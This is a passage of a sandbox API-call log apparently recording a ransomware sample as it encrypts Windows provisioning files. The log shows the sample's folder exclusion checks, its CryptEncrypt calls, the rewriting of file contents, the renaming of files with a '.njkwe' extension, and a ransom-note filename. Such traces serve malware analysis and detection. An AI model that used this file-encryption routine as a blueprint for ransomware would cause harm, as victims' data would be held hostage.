lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2db, lpOverlapped=0x0) returned 1 [0081.486] GetProcessHeap () returned 0xbe0000 [0081.486] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.486] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.486] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.486] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.486] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.486] CloseHandle (hObject=0x43c) returned 1 [0081.487] GetProcessHeap () returned 0xbe0000 [0081.487] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.487] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\501__Connections_Cellular_T-Mobile USA_ Tracfone (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 202 [0081.487] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\501__Connections_Cellular_T-Mobile USA_ Tracfone (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\501__connections_cellular_t-mobile usa_ tracfone (united states)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\501__Connections_Cellular_T-Mobile USA_ Tracfone (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\501__connections_cellular_t-mobile usa_ tracfone (united states)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.487] GetProcessHeap () returned 0xbe0000 [0081.487] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.488] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91213f95, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x91213f95, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x91213f95, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="502__Connections_Cellular_T-Mobile USA_ ASpider (United States)_i0$(__MVID)@WAP.provxml", cAlternateFileName="502__C~1.PRO")) returned 1 [0081.488] lstrcmpiW (lpString1="502__Connections_Cellular_T-Mobile USA_ ASpider (United States)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.488] lstrcmpiW (lpString1="502__Connections_Cellular_T-Mobile USA_ ASpider (United States)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.488] lstrcmpiW (lpString1="502__Connections_Cellular_T-Mobile USA_ ASpider (United States)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.488] lstrcmpiW (lpString1="502__Connections_Cellular_T-Mobile USA_ ASpider (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.488] lstrcmpiW (lpString1="502__Connections_Cellular_T-Mobile USA_ ASpider (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.488] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\502__Connections_Cellular_T-Mobile USA_ ASpider (United States)_i0$(__MVID)@WAP.provxml") returned 181 [0081.488] StrStrIW (lpFirst="502__Connections_Cellular_T-Mobile USA_ ASpider (United States)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.488] lstrcmpW (lpString1="502__Connections_Cellular_T-Mobile USA_ ASpider (United States)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.488] lstrcmpW (lpString1="502__Connections_Cellular_T-Mobile USA_ ASpider (United States)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.488] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\502__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.488] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\502__Connections_Cellular_T-Mobile USA_ ASpider (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\502__connections_cellular_t-mobile usa_ aspider (united states)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.488] GetTickCount () returned 0x1154af0 [0081.488] GetTickCount () returned 0x1154af0 [0081.488] GetTickCount () returned 0x1154af0 [0081.488] GetTickCount () returned 0x1154af0 [0081.488] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.488] GetProcessHeap () returned 0xbe0000 [0081.488] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.488] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2d3, lpOverlapped=0x0) returned 1 [0081.515] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.515] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2d3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2d3, lpOverlapped=0x0) returned 1 [0081.516] GetProcessHeap () returned 0xbe0000 [0081.516] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.516] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.516] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.516] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.516] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.516] CloseHandle (hObject=0x43c) returned 1 [0081.517] GetProcessHeap () returned 0xbe0000 [0081.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.517] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\502__Connections_Cellular_T-Mobile USA_ ASpider (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 201 [0081.517] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\502__Connections_Cellular_T-Mobile USA_ ASpider (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\502__connections_cellular_t-mobile usa_ aspider (united states)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\502__Connections_Cellular_T-Mobile USA_ ASpider (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\502__connections_cellular_t-mobile usa_ aspider (united states)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.518] GetProcessHeap () returned 0xbe0000 [0081.518] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.518] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91213f95, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x91213f95, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x91213f95, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2ce, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="503__Connections_Cellular_T-Mobile USA_ Wyless (United States)_i0$(__MVID)@WAP.provxml", cAlternateFileName="503__C~1.PRO")) returned 1 [0081.518] lstrcmpiW (lpString1="503__Connections_Cellular_T-Mobile USA_ Wyless (United States)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.518] lstrcmpiW (lpString1="503__Connections_Cellular_T-Mobile USA_ Wyless (United States)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.518] lstrcmpiW (lpString1="503__Connections_Cellular_T-Mobile USA_ Wyless (United States)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.518] lstrcmpiW (lpString1="503__Connections_Cellular_T-Mobile USA_ Wyless (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.518] lstrcmpiW (lpString1="503__Connections_Cellular_T-Mobile USA_ Wyless (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.518] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\503__Connections_Cellular_T-Mobile USA_ Wyless (United States)_i0$(__MVID)@WAP.provxml") returned 180 [0081.518] StrStrIW (lpFirst="503__Connections_Cellular_T-Mobile USA_ Wyless (United States)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.518] lstrcmpW (lpString1="503__Connections_Cellular_T-Mobile USA_ Wyless (United States)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.518] lstrcmpW (lpString1="503__Connections_Cellular_T-Mobile USA_ Wyless (United States)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.518] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\503__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.518] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\503__Connections_Cellular_T-Mobile USA_ Wyless (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\503__connections_cellular_t-mobile usa_ wyless (united states)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.519] GetTickCount () returned 0x1154b0f [0081.519] GetTickCount () returned 0x1154b0f [0081.519] GetTickCount () returned 0x1154b0f [0081.519] GetTickCount () returned 0x1154b0f [0081.519] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.519] GetProcessHeap () returned 0xbe0000 [0081.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.519] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2ce, lpOverlapped=0x0) returned 1 [0081.521] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.521] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2ce, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2ce, lpOverlapped=0x0) returned 1 [0081.521] GetProcessHeap () returned 0xbe0000 [0081.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.521] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.521] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.522] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.522] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.522] CloseHandle (hObject=0x43c) returned 1 [0081.522] GetProcessHeap () returned 0xbe0000 [0081.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.522] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\503__Connections_Cellular_T-Mobile USA_ Wyless (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 200 [0081.522] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\503__Connections_Cellular_T-Mobile USA_ Wyless (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\503__connections_cellular_t-mobile usa_ wyless (united states)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\503__Connections_Cellular_T-Mobile USA_ Wyless (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\503__connections_cellular_t-mobile usa_ wyless (united states)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.523] GetProcessHeap () returned 0xbe0000 [0081.523] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.523] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9123a200, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9123a200, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9123a200, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="504__Connections_Cellular_T-Mobile USA_ Solavei (United States)_i0$(__MVID)@WAP.provxml", cAlternateFileName="504__C~1.PRO")) returned 1 [0081.523] lstrcmpiW (lpString1="504__Connections_Cellular_T-Mobile USA_ Solavei (United States)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.523] lstrcmpiW (lpString1="504__Connections_Cellular_T-Mobile USA_ Solavei (United States)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.523] lstrcmpiW (lpString1="504__Connections_Cellular_T-Mobile USA_ Solavei (United States)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.523] lstrcmpiW (lpString1="504__Connections_Cellular_T-Mobile USA_ Solavei (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.523] lstrcmpiW (lpString1="504__Connections_Cellular_T-Mobile USA_ Solavei (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.523] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\504__Connections_Cellular_T-Mobile USA_ Solavei (United States)_i0$(__MVID)@WAP.provxml") returned 181 [0081.523] StrStrIW (lpFirst="504__Connections_Cellular_T-Mobile USA_ Solavei (United States)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.523] lstrcmpW (lpString1="504__Connections_Cellular_T-Mobile USA_ Solavei (United States)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.523] lstrcmpW (lpString1="504__Connections_Cellular_T-Mobile USA_ Solavei (United States)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.523] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\504__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.523] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\504__Connections_Cellular_T-Mobile USA_ Solavei (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\504__connections_cellular_t-mobile usa_ solavei (united states)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.524] GetTickCount () returned 0x1154b0f [0081.524] GetTickCount () returned 0x1154b0f [0081.524] GetTickCount () returned 0x1154b0f [0081.524] GetTickCount () returned 0x1154b0f [0081.524] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.524] GetProcessHeap () returned 0xbe0000 [0081.524] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.524] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2d4, lpOverlapped=0x0) returned 1 [0081.527] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.527] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2d4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2d4, lpOverlapped=0x0) returned 1 [0081.528] GetProcessHeap () returned 0xbe0000 [0081.528] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.528] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.528] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.528] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.528] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.528] CloseHandle (hObject=0x43c) returned 1 [0081.531] GetProcessHeap () returned 0xbe0000 [0081.531] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.531] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\504__Connections_Cellular_T-Mobile USA_ Solavei (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 201 [0081.531] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\504__Connections_Cellular_T-Mobile USA_ Solavei (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\504__connections_cellular_t-mobile usa_ solavei (united states)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\504__Connections_Cellular_T-Mobile USA_ Solavei (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\504__connections_cellular_t-mobile usa_ solavei (united states)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.531] GetProcessHeap () returned 0xbe0000 [0081.531] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.532] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9123a200, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9123a200, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9123a200, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2da, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="505__Connections_Cellular_Verizon (United States) Admin_i1$(__MVID)@WAP.provxml", cAlternateFileName="505__C~1.PRO")) returned 1 [0081.532] lstrcmpiW (lpString1="505__Connections_Cellular_Verizon (United States) Admin_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.532] lstrcmpiW (lpString1="505__Connections_Cellular_Verizon (United States) Admin_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.532] lstrcmpiW (lpString1="505__Connections_Cellular_Verizon (United States) Admin_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.532] lstrcmpiW (lpString1="505__Connections_Cellular_Verizon (United States) Admin_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.532] lstrcmpiW (lpString1="505__Connections_Cellular_Verizon (United States) Admin_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.532] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\505__Connections_Cellular_Verizon (United States) Admin_i1$(__MVID)@WAP.provxml") returned 173 [0081.532] StrStrIW (lpFirst="505__Connections_Cellular_Verizon (United States) Admin_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.532] lstrcmpW (lpString1="505__Connections_Cellular_Verizon (United States) Admin_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.532] lstrcmpW (lpString1="505__Connections_Cellular_Verizon (United States) Admin_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.532] StrCmpNW 